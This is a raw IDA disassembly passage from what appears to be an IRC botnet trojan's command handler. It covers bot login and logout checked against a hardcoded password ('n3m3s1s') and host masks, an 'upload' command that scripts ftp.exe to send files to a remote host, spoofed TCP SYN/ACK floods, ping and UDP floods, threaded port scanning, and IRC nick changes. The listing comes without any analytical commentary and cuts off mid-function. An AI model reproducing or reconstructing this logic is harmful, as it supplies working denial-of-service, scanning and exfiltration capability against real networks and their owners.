loc_40C3B3: ; CODE XREF: sub_4078FA+41AD�j
add esp, 0Ch
jmp loc_40AEAA
; ---------------------------------------------------------------------------
loc_40C3BB: ; CODE XREF: sub_4078FA+D77�j
; sub_4078FA+D8B�j
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
jz short loc_40C413
push ebx
call sub_412F42
test eax, eax
pop ecx
jl short loc_40C40B
cmp eax, 2
jge short loc_40C40B
mov edx, [ebp+arg_18]
mov ecx, eax
shl ecx, 7
lea esi, [ecx+edx]
cmp byte ptr [esi], 0
jz short loc_40C403
lea eax, [esi+1]
push eax
lea eax, [ebp+var_2E0]
push offset aMainUserSLogge ; "[MAIN]: User %s logged out."
push eax
call sub_412BB5
add esp, 0Ch
and byte ptr [esi], 0
jmp short loc_40C47E
; ---------------------------------------------------------------------------
loc_40C403: ; CODE XREF: sub_4078FA+4AEA�j
push eax
push offset aMainNoUserLogg ; "[MAIN]: No user logged in at slot: %d."
jmp short loc_40C46F
; ---------------------------------------------------------------------------
loc_40C40B: ; CODE XREF: sub_4078FA+4AD5�j
; sub_4078FA+4ADA�j
push eax
push offset aMainInvalidLog ; "[MAIN]: Invalid login slot number: %d."
jmp short loc_40C46F
; ---------------------------------------------------------------------------
loc_40C413: ; CODE XREF: sub_4078FA+4ACA�j
mov edx, [ebp+arg_18]
xor edi, edi
loc_40C418: ; CODE XREF: sub_4078FA+4B5B�j
mov esi, [ebp+var_A4]
mov eax, edx
loc_40C420: ; CODE XREF: sub_4078FA+4B42�j
mov bl, [eax]
mov cl, bl
cmp bl, [esi]
jnz short loc_40C442
test cl, cl
jz short loc_40C43E
mov bl, [eax+1]
mov cl, bl
cmp bl, [esi+1]
jnz short loc_40C442
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_40C420
loc_40C43E: ; CODE XREF: sub_4078FA+4B30�j
xor eax, eax
jmp short loc_40C447
; ---------------------------------------------------------------------------
loc_40C442: ; CODE XREF: sub_4078FA+4B2C�j
; sub_4078FA+4B3A�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40C447: ; CODE XREF: sub_4078FA+4B46�j
test eax, eax
jz short loc_40C459
inc edi
add edx, 80h
cmp edi, 2
jl short loc_40C418
jmp short loc_40C47E
; ---------------------------------------------------------------------------
loc_40C459: ; CODE XREF: sub_4078FA+4B4F�j
mov eax, [ebp+arg_18]
shl edi, 7
and byte ptr [edi+eax], 0
lea eax, [ebp+var_E0]
push eax
push offset aMainUserSLogge ; "[MAIN]: User %s logged out."
loc_40C46F: ; CODE XREF: sub_4078FA+3780�j
; sub_4078FA+4B0F�j ...
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
add esp, 0Ch
loc_40C47E: ; CODE XREF: sub_4078FA+2B08�j
; sub_4078FA+2B2C�j ...
cmp [ebp+var_C], 0
jnz short loc_40C4A1
push 0
loc_40C486: ; CODE XREF: sub_4078FA+4FD0�j
; sub_4078FA+5113�j
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
loc_40C499: ; CODE XREF: sub_4078FA+2611�j
; sub_4078FA+2733�j ...
call sub_4045DD
add esp, 14h
loc_40C4A1: ; CODE XREF: sub_4078FA+11E6�j
; sub_4078FA+25FB�j ...
xor esi, esi
inc esi
jmp loc_409018
; ---------------------------------------------------------------------------
loc_40C4A9: ; CODE XREF: sub_4078FA+D4F�j
; sub_4078FA+D63�j
mov edi, [ebp+var_A0]
push 4
mov esi, offset dword_4263EC
pop ecx
xor edx, edx
repe cmpsb
jz loc_408D7C
call sub_41105B
loc_40C4C6: ; CODE XREF: sub_4078FA+4497�j
push 0
call ds:dword_41F02C
loc_40C4CE: ; CODE XREF: sub_4078FA+156A�j
push 8
mov edi, eax
mov esi, offset aHttpcon ; "httpcon"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C685
push 5
mov edi, eax
mov esi, offset aHcon ; "hcon"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C685
cmp [ebp+ebx+var_90], edx
jz loc_407B7B
mov edi, eax
push 7
mov esi, offset aUpload ; "upload"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40CFE2
mov edi, [ebp+ebx+var_90]
push 4
push edi
call sub_40241F
test eax, eax
pop ecx
pop ecx
jnz short loc_40C546
push edi
push offset aFtpFileNotFoun ; "[FTP]: File not found: %s."
loc_40C532: ; CODE XREF: sub_4078FA+38A4�j
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
add esp, 0Ch
jmp loc_40ABC7
; ---------------------------------------------------------------------------
loc_40C546: ; CODE XREF: sub_4078FA+4C30�j
call ds:dword_41F004
push eax
call sub_412D64
pop ecx
call sub_412D71
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_412D71
push 63h
cdq
pop ecx
idiv ecx
push edx
call sub_412D71
cdq
mov ecx, 3E7h
idiv ecx
lea eax, [ebp+var_15E8]
push edx
push eax
lea eax, [ebp+var_1344]
push offset aSIII_dll ; "%s\\%i%i%i.dll"
push eax
call sub_412BB5
lea eax, [ebp+var_1344]
push offset aAb ; "ab"
push eax
call sub_413393
add esp, 20h
test eax, eax
mov [ebp+arg_0], eax
jz loc_407B7B
mov esi, [ebp+ebx+var_A0]
push edi
push [ebp+var_14]
push [ebp+ebx+var_98]
push [ebp+ebx+var_9C]
push esi
push offset aOpenSSSSPutSBy ; "open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
push eax
call sub_41414F
push [ebp+arg_0]
call sub_412F93
lea eax, [ebp+var_1344]
push eax
lea eax, [ebp+var_B70]
push offset aSS_3 ; "-s:%s"
push eax
call sub_412BB5
add esp, 2Ch
xor eax, eax
push eax
push eax
lea ecx, [ebp+var_B70]
push ecx
push offset aFtp_exe ; "ftp.exe"
push offset aOpen ; "open"
push eax
call dword_4335A8
test eax, eax
push esi
push edi
jz short loc_40C621
push offset aFtpUploadingFi ; "[FTP]: Uploading file: %s to: %s"
jmp short loc_40C626
; ---------------------------------------------------------------------------
loc_40C621: ; CODE XREF: sub_4078FA+4D1E�j
push offset aFtpUploading_0 ; "[FTP]: Uploading file: %s to: %s failed"...
loc_40C626: ; CODE XREF: sub_4078FA+4D25�j
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_C], 0
jnz short loc_40C651
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
loc_40C651: ; CODE XREF: sub_4078FA+4D38�j
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
jmp short loc_40C66B
; ---------------------------------------------------------------------------
loc_40C65F: ; CODE XREF: sub_4078FA+4D84�j
lea eax, [ebp+var_1344]
push eax
call sub_414125
loc_40C66B: ; CODE XREF: sub_4078FA+4D63�j
lea eax, [ebp+var_1344]
push 4
push eax
call sub_40241F
add esp, 0Ch
test eax, eax
jnz short loc_40C65F
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40C685: ; CODE XREF: sub_4078FA+4BE2�j
; sub_4078FA+4BF6�j
push [ebp+ebx+var_90]
push [ebp+var_14]
push [ebp+ebx+var_98]
push [ebp+ebx+var_9C]
call sub_412F42
pop ecx
push eax
push [ebp+ebx+var_A0]
push [ebp+var_C]
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4038B7
jmp loc_40CFDF
; ---------------------------------------------------------------------------
loc_40C6C4: ; CODE XREF: sub_4078FA+1542�j
; sub_4078FA+1556�j
push [ebp+ebx+var_A0]
lea eax, [ebp+var_998]
push 80h
push eax
call sub_412E0D
add esp, 0Ch
push 4
lea edi, [ebp+var_998]
mov esi, offset aSyn_0 ; "syn"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40C725
push 4
lea edi, [ebp+var_998]
mov esi, offset aAck ; "ack"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40C725
push 7
lea edi, [ebp+var_998]
mov esi, offset aRandom_0 ; "random"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40C725
push offset aTcpInvalidFloo ; "[TCP]: Invalid flood type specified."
jmp loc_40B61E
; ---------------------------------------------------------------------------
loc_40C725: ; CODE XREF: sub_4078FA+4DF7�j
; sub_4078FA+4E0B�j ...
push [ebp+var_14]
call sub_412F42
xor edi, edi
cmp eax, edi
pop ecx
mov [ebp+var_888], eax
jle loc_40C8AD
mov eax, [ebp+ebx+var_A0]
push eax
mov [ebp+var_8], eax
mov esi, 80h
lea eax, [ebp+var_998]
push esi
push eax
call sub_412E0D
mov eax, [ebp+ebx+var_9C]
push eax
mov [ebp+var_10], eax
lea eax, [ebp+var_A18]
push esi
push eax
call sub_412E0D
mov eax, [ebp+ebx+var_98]
push eax
mov [ebp+arg_0], eax
call sub_412F42
mov [ebp+var_894], eax
mov eax, [ebp+ebx+var_90]
add esp, 1Ch
cmp eax, edi
jz short loc_40C7A6
push eax
call sub_412F42
pop ecx
mov [ebp+var_890], eax
jmp short loc_40C7AC
; ---------------------------------------------------------------------------
loc_40C7A6: ; CODE XREF: sub_4078FA+4E9B�j
mov [ebp+var_890], edi
loc_40C7AC: ; CODE XREF: sub_4078FA+4EAA�j
mov ebx, [ebp+ebx+var_8C]
cmp ebx, edi
jz short loc_40C7C6
push ebx
call sub_412F42
pop ecx
mov [ebp+var_88C], eax
jmp short loc_40C7CC
; ---------------------------------------------------------------------------
loc_40C7C6: ; CODE XREF: sub_4078FA+4EBB�j
mov [ebp+var_88C], edi
loc_40C7CC: ; CODE XREF: sub_4078FA+4ECA�j
push [ebp+var_9C]
xor eax, eax
cmp [ebp+var_43A], al
push esi
setnz al
mov [ebp+var_884], eax
mov eax, [ebp+arg_4]
mov [ebp+var_A1C], eax
lea eax, [ebp+var_918]
push eax
call sub_412E0D
mov eax, [ebp+var_4]
mov [ebp+var_880], eax
mov eax, [ebp+var_C]
add esp, 0Ch
cmp [ebp+var_884], edi
mov [ebp+var_87C], eax
mov eax, offset aSpoofed ; "Spoofed"
jnz short loc_40C820
mov eax, offset aNormal ; "Normal"
loc_40C820: ; CODE XREF: sub_4078FA+4F1F�j
push [ebp+var_14]
push [ebp+arg_0]
push [ebp+var_10]
push [ebp+var_8]
push eax
push offset aTcpSSFloodingS ; "[TCP]: %s %s flooding: (%s:%s) for %s s"...
lea eax, [ebp+var_2E0]
push 200h
push eax
call sub_412E0D
push edi
lea eax, [ebp+var_2E0]
push 0Dh
push eax
call sub_410EEA
add esp, 2Ch
mov [ebp+var_898], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_A1C]
push eax
push offset sub_41046C
push edi
push edi
call ds:dword_41F00C
mov ecx, [ebp+var_898]
imul ecx, 234h
cmp eax, edi
mov dword_43434C[ecx], eax
jnz short loc_40C8A3
call ds:dword_41F008
push eax
push offset aTcpFailedToSta ; "[TCP]: Failed to start flood thread, er"...
jmp loc_40B73B
; ---------------------------------------------------------------------------
loc_40C89B: ; CODE XREF: sub_4078FA+4FAF�j
push 32h
call ds:dword_41F000
loc_40C8A3: ; CODE XREF: sub_4078FA+4F8E�j
cmp [ebp+var_878], edi
jz short loc_40C89B
jmp short loc_40C8C0
; ---------------------------------------------------------------------------
loc_40C8AD: ; CODE XREF: sub_4078FA+4E3E�j
push offset aTcpInvalidFl_0 ; "[TCP]: Invalid flood time must be great"...
loc_40C8B2: ; CODE XREF: sub_4078FA+53D4�j
; sub_4078FA+5490�j
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
loc_40C8BE: ; CODE XREF: sub_4078FA+3D32�j
pop ecx
pop ecx
loc_40C8C0: ; CODE XREF: sub_4078FA+3E50�j
; sub_4078FA+3E65�j ...
cmp [ebp+var_C], edi
jnz loc_40C4A1
push edi
jmp loc_40C486
; ---------------------------------------------------------------------------
loc_40C8CF: ; CODE XREF: sub_4078FA+1506�j
; sub_4078FA+151A�j ...
cmp dword_433620, 0
jnz loc_40C9E8
mov eax, [ebp+var_C]
mov [ebp+var_758], eax
mov eax, [ebp+var_4]
push 7Fh
push [ebp+ebx+var_A0]
mov [ebp+var_75C], eax
lea eax, [ebp+var_7F0]
push eax
call sub_412C40
push [ebp+ebx+var_9C]
call sub_412F42
push [ebp+ebx+var_98]
mov [ebp+var_770], eax
call sub_412F42
push [ebp+var_14]
mov [ebp+var_76C], eax
call sub_412F42
push 7Fh
push [ebp+var_9C]
mov [ebp+var_768], eax
lea eax, [ebp+var_870]
push eax
call sub_412C40
push [ebp+var_768]
mov eax, [ebp+arg_4]
push [ebp+var_76C]
mov [ebp+var_874], eax
lea eax, [ebp+var_7F0]
push eax
push [ebp+var_770]
lea eax, [ebp+var_2E0]
push offset aPingSendingDPi ; "[PING]: Sending %d pings to %s. packet "...
push eax
call sub_412BB5
xor esi, esi
push esi
lea eax, [ebp+var_2E0]
push 0Fh
push eax
call sub_410EEA
add esp, 48h
mov [ebp+var_760], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_874]
push eax
push offset sub_406CD9
push esi
push esi
call ds:dword_41F00C
mov ecx, [ebp+var_760]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_40C9DE
call ds:dword_41F008
push eax
push offset aPingFailedToSt ; "[PING]: Failed to start flood thread, e"...
jmp loc_40CF6C
; ---------------------------------------------------------------------------
loc_40C9D6: ; CODE XREF: sub_4078FA+50EA�j
push 32h
call ds:dword_41F000
loc_40C9DE: ; CODE XREF: sub_4078FA+50C9�j
cmp [ebp+var_754], esi
jz short loc_40C9D6
jmp short loc_40CA03
; ---------------------------------------------------------------------------
loc_40C9E8: ; CODE XREF: sub_4078FA+4FDC�j
push 1FFh
lea eax, [ebp+var_2E0]
push offset aIcmp_dllNotAva ; "ICMP.dll not available"
push eax
call sub_412C40
add esp, 0Ch
xor esi, esi
loc_40CA03: ; CODE XREF: sub_4078FA+3D0E�j
; sub_4078FA+50EC�j ...
cmp [ebp+var_C], esi
jnz loc_40C4A1
push esi
jmp loc_40C486
; ---------------------------------------------------------------------------
loc_40CA12: ; CODE XREF: sub_4078FA+14CA�j
; sub_4078FA+14DE�j ...
mov eax, [ebp+var_C]
mov edi, [ebp+var_4]
push 7Fh
push [ebp+ebx+var_A0]
mov [ebp+var_758], eax
lea eax, [ebp+var_7F0]
push eax
mov [ebp+var_75C], edi
call sub_412C40
push [ebp+ebx+var_9C]
call sub_412F42
push [ebp+ebx+var_98]
mov [ebp+var_770], eax
call sub_412F42
push [ebp+var_14]
mov [ebp+var_76C], eax
call sub_412F42
mov ebx, [ebp+ebx+var_90]
xor esi, esi
add esp, 18h
cmp ebx, esi
mov [ebp+var_768], eax
jz short loc_40CA8A
push ebx
call sub_412F42
pop ecx
mov [ebp+var_764], eax
jmp short loc_40CA90
; ---------------------------------------------------------------------------
loc_40CA8A: ; CODE XREF: sub_4078FA+517F�j
mov [ebp+var_764], esi
loc_40CA90: ; CODE XREF: sub_4078FA+518E�j
push 7Fh
push [ebp+var_9C]
lea eax, [ebp+var_870]
push eax
call sub_412C40
push [ebp+var_768]
mov ebx, [ebp+arg_4]
push [ebp+var_76C]
lea eax, [ebp+var_7F0]
push eax
push [ebp+var_770]
lea eax, [ebp+var_2E0]
push offset aUdpSendingDPac ; "[UDP]: Sending %d packets to: %s. Packe"...
push eax
mov [ebp+var_874], ebx
call sub_412BB5
push esi
lea eax, [ebp+var_2E0]
push 10h
push eax
call sub_410EEA
add esp, 30h
mov [ebp+var_760], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_874]
push eax
push offset sub_406E62
push esi
push esi
call ds:dword_41F00C
mov ecx, [ebp+var_760]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_40CB5F
call ds:dword_41F008
push eax
lea eax, [ebp+var_2E0]
push offset aUdpFailedToSta ; "[UDP]: Failed to start flood thread, er"...
push eax
call sub_412BB5
add esp, 0Ch
loc_40CB39: ; CODE XREF: sub_4078FA+526D�j
cmp [ebp+var_C], esi
jnz loc_40C4A1
push esi
push edi
loc_40CB44: ; CODE XREF: sub_4078FA+2AD4�j
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push ebx
jmp loc_40C499
; ---------------------------------------------------------------------------
loc_40CB57: ; CODE XREF: sub_4078FA+526B�j
push 32h
call ds:dword_41F000
loc_40CB5F: ; CODE XREF: sub_4078FA+5222�j
cmp [ebp+var_754], esi
jz short loc_40CB57
jmp short loc_40CB39
; ---------------------------------------------------------------------------
loc_40CB69: ; CODE XREF: sub_4078FA+14A2�j
; sub_4078FA+14B6�j
push 9
call sub_4110DA
mov esi, [ebp+ebx+var_9C]
push esi
mov edi, eax
call sub_412F42
add eax, edi
cmp eax, 258h
pop ecx
pop ecx
jle short loc_40CBBB
push edi
lea eax, [ebp+var_2E0]
push offset aScanAlreadyDSc ; "[SCAN]: Already %d scanning threads. To"...
push eax
call sub_412BB5
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
jmp loc_40AB80
; ---------------------------------------------------------------------------
loc_40CBBB: ; CODE XREF: sub_4078FA+528E�j
push [ebp+ebx+var_A0]
call sub_412F42
push esi
mov [ebp+var_4E4], eax
call sub_412F42
push [ebp+ebx+var_98]
mov [ebp+var_4CC], eax
call sub_412F42
add esp, 0Ch
cmp eax, 5
mov [ebp+var_4E0], eax
jnb short loc_40CBFC
push 5
pop eax
mov [ebp+var_4E0], eax
loc_40CBFC: ; CODE XREF: sub_4078FA+52F7�j
push 3Ch
pop ecx
cmp eax, ecx
jbe short loc_40CC09
mov [ebp+var_4E0], ecx
loc_40CC09: ; CODE XREF: sub_4078FA+5307�j
push [ebp+var_14]
call sub_412F42
mov [ebp+var_4DC], eax
mov eax, 320h
cmp [ebp+var_4DC], eax
pop ecx
jbe short loc_40CC2B
mov [ebp+var_4DC], eax
loc_40CC2B: ; CODE XREF: sub_4078FA+5329�j
push [ebp+arg_4]
or [ebp+var_4C8], 0FFFFFFFFh
call sub_406C33
pop ecx
lea edx, [ebp+var_66C]
loc_40CC41: ; CODE XREF: sub_4078FA+534F�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40CC41
xor edi, edi
cmp dword_42A068, edi
mov [ebp+var_5EC], edi
mov [ebp+var_10], edi
jz short loc_40CCC1
mov ecx, offset dword_42A068
loc_40CC63: ; CODE XREF: sub_4078FA+53A7�j
mov edi, [ebp+ebx+var_A0]
lea esi, [ecx-28h]
loc_40CC6D: ; CODE XREF: sub_4078FA+538F�j
mov dl, [esi]
mov al, dl
cmp dl, [edi]
jnz short loc_40CC8F
test al, al
jz short loc_40CC8B
mov dl, [esi+1]
mov al, dl
cmp dl, [edi+1]
jnz short loc_40CC8F
inc esi
inc esi
inc edi
inc edi
test al, al
jnz short loc_40CC6D
loc_40CC8B: ; CODE XREF: sub_4078FA+537D�j
xor eax, eax
jmp short loc_40CC94
; ---------------------------------------------------------------------------
loc_40CC8F: ; CODE XREF: sub_4078FA+5379�j
; sub_4078FA+5387�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40CC94: ; CODE XREF: sub_4078FA+5393�j
test eax, eax
jz short loc_40CCA5
inc [ebp+var_10]
add ecx, 3Ch
cmp dword ptr [ecx], 0
jnz short loc_40CC63
jmp short loc_40CCBF
; ---------------------------------------------------------------------------
loc_40CCA5: ; CODE XREF: sub_4078FA+539C�j
mov eax, [ebp+var_10]
mov ecx, eax
imul ecx, 3Ch
mov ecx, dword_42A068[ecx]
mov [ebp+var_4E4], ecx
mov [ebp+var_4C8], eax
loc_40CCBF: ; CODE XREF: sub_4078FA+53A9�j
xor edi, edi
loc_40CCC1: ; CODE XREF: sub_4078FA+5362�j
cmp [ebp+var_4E4], edi
jnz short loc_40CCD3
push offset aScanFailedTo_1 ; "[SCAN]: Failed to start scan, port is i"...
jmp loc_40C8B2
; ---------------------------------------------------------------------------
loc_40CCD3: ; CODE XREF: sub_4078FA+53CD�j
mov esi, [ebp+ebx+var_90]
cmp esi, edi
mov [ebp+var_AC], esi
jz short loc_40CD14
cmp byte ptr [esi], 23h
jz short loc_40CD14
push esi
lea eax, [ebp+var_67C]
push 10h
push eax
call sub_412E0D
push 78h
push esi
call sub_413F30
add esp, 14h
neg eax
sbb eax, eax
neg eax
mov [ebp+var_4B8], eax
jmp loc_40CE4A
; ---------------------------------------------------------------------------
loc_40CD14: ; CODE XREF: sub_4078FA+53E8�j
; sub_4078FA+53ED�j
cmp [ebp+var_432], 0
jz short loc_40CD3E
push 7Fh
lea eax, [ebp+var_66C]
push offset dword_42AF44
push eax
call sub_412C40
mov eax, dword_42AF54
add esp, 0Ch
mov [ebp+var_5EC], eax
loc_40CD3E: ; CODE XREF: sub_4078FA+5421�j
cmp [ebp+var_43B], 0
jz short loc_40CD6A
push edi
push 9
push offset aStoppingPrevio ; "Stopping previous scans"
push offset aScan_0 ; "[SCAN]"
push 1
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_411120
add esp, 20h
loc_40CD6A: ; CODE XREF: sub_4078FA+544B�j
cmp [ebp+var_44B], 0
jnz short loc_40CD8F
cmp [ebp+var_44A], 0
jnz short loc_40CD8F
cmp [ebp+var_43A], 0
jnz short loc_40CD8F
push offset aScanFailedTo_2 ; "[SCAN]: Failed to start scan, no IP spe"...
jmp loc_40C8B2
; ---------------------------------------------------------------------------
loc_40CD8F: ; CODE XREF: sub_4078FA+5477�j
; sub_4078FA+5480�j ...
push 10h
pop esi
lea eax, [ebp+var_A8]
push eax
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_4]
mov [ebp+var_A8], esi
call dword_433418
mov al, [ebp+var_44B]
neg al
push esi
sbb eax, eax
and eax, 0FFFF0100h
add eax, 0FFFFh
and [ebp+var_C4], eax
push [ebp+var_C4]
call dword_433520
push eax
lea eax, [ebp+var_67C]
push eax
call sub_412C40
add esp, 0Ch
cmp [ebp+var_43A], 0
jz short loc_40CE44
xor eax, eax
cmp [ebp+var_44B], al
push 30h
setnz al
inc eax
inc eax
mov esi, eax
lea eax, [ebp+var_67C]
push eax
call sub_412C10
and byte ptr [ebp+arg_0+3], 0
cmp esi, edi
pop ecx
pop ecx
jle short loc_40CE38
loc_40CE16: ; CODE XREF: sub_4078FA+553C�j
cmp eax, edi
jz short loc_40CE38
mov byte ptr [eax], 78h
lea eax, [ebp+var_67C]
push 30h
push eax
call sub_412C10
inc byte ptr [ebp+arg_0+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_0+3]
cmp ecx, esi
jl short loc_40CE16
loc_40CE38: ; CODE XREF: sub_4078FA+551A�j
; sub_4078FA+551E�j
mov [ebp+var_4B8], 1
jmp short loc_40CE4A
; ---------------------------------------------------------------------------
loc_40CE44: ; CODE XREF: sub_4078FA+54F3�j
mov [ebp+var_4B8], edi
loc_40CE4A: ; CODE XREF: sub_4078FA+5415�j
; sub_4078FA+5548�j
mov eax, [ebp+arg_4]
push [ebp+var_9C]
mov [ebp+var_4E8], eax
mov eax, [ebp+var_4]
mov [ebp+var_4C0], eax
mov eax, [ebp+var_C]
mov [ebp+var_4BC], eax
mov esi, 80h
lea eax, [ebp+var_5E8]
push esi
push eax
call sub_412E0D
mov ebx, [ebp+ebx+var_8C]
add esp, 0Ch
cmp ebx, edi
jz short loc_40CE9E
push ebx
loc_40CE8C: ; CODE XREF: sub_4078FA+55B4�j
push esi
loc_40CE8D: ; CODE XREF: sub_4078FA+55D1�j
lea eax, [ebp+var_568]
push eax
call sub_412E0D
add esp, 0Ch
jmp short loc_40CED4
; ---------------------------------------------------------------------------
loc_40CE9E: ; CODE XREF: sub_4078FA+558F�j
mov eax, [ebp+var_AC]
cmp eax, edi
jz short loc_40CEB0
cmp byte ptr [eax], 23h
jnz short loc_40CEB0
push eax
jmp short loc_40CE8C
; ---------------------------------------------------------------------------
loc_40CEB0: ; CODE XREF: sub_4078FA+55AC�j
; sub_4078FA+55B1�j
xor ecx, ecx
mov eax, offset aMurders ; "#murders"
inc ecx
mov edi, 41FA76h
mov esi, eax
xor edx, edx
repe cmpsb
jz short loc_40CECD
push eax
push 80h
jmp short loc_40CE8D
; ---------------------------------------------------------------------------
loc_40CECD: ; CODE XREF: sub_4078FA+55C9�j
and [ebp+var_568], 0
loc_40CED4: ; CODE XREF: sub_4078FA+55A2�j
xor esi, esi
cmp [ebp+var_4B8], esi
mov eax, offset aRandom ; "Random"
jnz short loc_40CEE8
mov eax, offset aSequential ; "Sequential"
loc_40CEE8: ; CODE XREF: sub_4078FA+55E7�j
push [ebp+var_4CC]
lea ecx, [ebp+var_67C]
push [ebp+var_4DC]
push [ebp+var_4E0]
push [ebp+var_4E4]
push ecx
push eax
lea eax, [ebp+var_2E0]
push offset aScanSPortScanS ; "[SCAN]: %s Port Scan started on %s:%d w"...
push eax
call sub_412BB5
push esi
lea eax, [ebp+var_2E0]
push 9
push eax
call sub_410EEA
add esp, 2Ch
mov [ebp+var_4D8], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_67C]
push eax
push offset sub_4018D1
push esi
push esi
call ds:dword_41F00C
mov ecx, [ebp+var_4D8]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_40CF88
call ds:dword_41F008
push eax
push offset aScanFailedTo_0 ; "[SCAN]: Failed to start scan thread, er"...
loc_40CF6C: ; CODE XREF: sub_4078FA+50D7�j
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
add esp, 0Ch
jmp loc_40CA03
; ---------------------------------------------------------------------------
loc_40CF80: ; CODE XREF: sub_4078FA+5694�j
push 32h
call ds:dword_41F000
loc_40CF88: ; CODE XREF: sub_4078FA+5664�j
cmp [ebp+var_4B4], esi
jz short loc_40CF80
jmp loc_40CA03
; ---------------------------------------------------------------------------
loc_40CF95: ; CODE XREF: sub_4078FA+D27�j
; sub_4078FA+D3B�j
push [ebp+ebx+var_A0]
xor eax, eax
cmp [ebp+var_43C], al
setnz al
push eax
push dword_42AE64
lea eax, [ebp+var_3AC]
push eax
call sub_40E7B0
lea eax, [ebp+var_3AC]
push eax
push offset aNickS_0 ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_404592
lea eax, [ebp+var_3AC]
push eax
push offset aMainRandomNick ; "[MAIN]: Random nick change: %s"
call sub_401CA7
loc_40CFDF: ; CODE XREF: sub_4078FA+4DC5�j
add esp, 24h
loc_40CFE2: ; CODE XREF: sub_4078FA+73B�j
; sub_4078FA+747�j ...
mov eax, [ebp+arg_24]
jmp loc_407B7E
; ---------------------------------------------------------------------------
loc_40CFEA: ; CODE XREF: sub_4078FA+7C8�j
; sub_4078FA+7DC�j
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
mov [ebp+var_8], ebx
jz loc_407B7B
cmp [ebp+var_20], 0
jnz loc_407B7B
push offset asc_4264C0 ; "!"
push [ebp+var_A4]
call sub_413859
mov esi, eax
push offset dword_424824
push 0
inc esi
call sub_413859
push offset asc_424820 ; "~"
push eax
call sub_413859
mov edi, [ebp+var_8]
mov ebx, eax
add esp, 18h
mov eax, offset aN3m3s1s ; "n3m3s1s"
loc_40D03D: ; CODE XREF: sub_4078FA+575F�j
mov dl, [eax]
mov cl, dl
cmp dl, [edi]
jnz short loc_40D05F
test cl, cl
jz short loc_40D05B
mov dl, [eax+1]
mov cl, dl
cmp dl, [edi+1]
jnz short loc_40D05F
inc eax
inc eax
inc edi
inc edi
test cl, cl
jnz short loc_40D03D
loc_40D05B: ; CODE XREF: sub_4078FA+574D�j
xor eax, eax
jmp short loc_40D064
; ---------------------------------------------------------------------------
loc_40D05F: ; CODE XREF: sub_4078FA+5749�j
; sub_4078FA+5757�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40D064: ; CODE XREF: sub_4078FA+5763�j
test eax, eax
jz short loc_40D0B3
push ebx
lea eax, [ebp+var_E0]
push eax
lea eax, [ebp+var_E0]
push eax
push offset aNoticeSPassAut ; "NOTICE %s :Pass auth failed (%s!%s).\r\n"
push [ebp+arg_4]
call sub_404592
lea eax, [ebp+var_E0]
push eax
push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"...
push [ebp+arg_4]
call sub_404592
push ebx
push esi
push offset aMainFailedPass ; "[MAIN]: *Failed pass auth by: (%s!%s)."
loc_40D09F: ; CODE XREF: sub_4078FA+580C�j
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
add esp, 30h
jmp loc_40C4A1
; ---------------------------------------------------------------------------
loc_40D0B3: ; CODE XREF: sub_4078FA+576C�j
xor edi, edi
loc_40D0B5: ; CODE XREF: sub_4078FA+57D3�j
push ebx
push off_42AF3C[edi]
call sub_4115E8
test eax, eax
pop ecx
pop ecx
jnz short loc_40D108
add edi, 4
cmp edi, 4
jb short loc_40D0B5
push ebx
lea eax, [ebp+var_E0]
push eax
lea eax, [ebp+var_E0]
push eax
push offset aNoticeSHostAut ; "NOTICE %s :Host Auth failed (%s!%s).\r\n"
push [ebp+arg_4]
call sub_404592
lea eax, [ebp+var_E0]
push eax
push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"...
push [ebp+arg_4]
call sub_404592
push ebx
push esi
push offset aMainFailedHost ; "[MAIN]: *Failed host auth by: (%s!%s)."
jmp short loc_40D09F
; ---------------------------------------------------------------------------
loc_40D108: ; CODE XREF: sub_4078FA+57CB�j
mov edx, [ebp+arg_18]
xor eax, eax
loc_40D10D: ; CODE XREF: sub_4078FA+5855�j
cmp byte ptr [edx], 0
jnz short loc_40D145
mov edi, [ebp+var_8]
mov esi, offset aN3m3s1s ; "n3m3s1s"
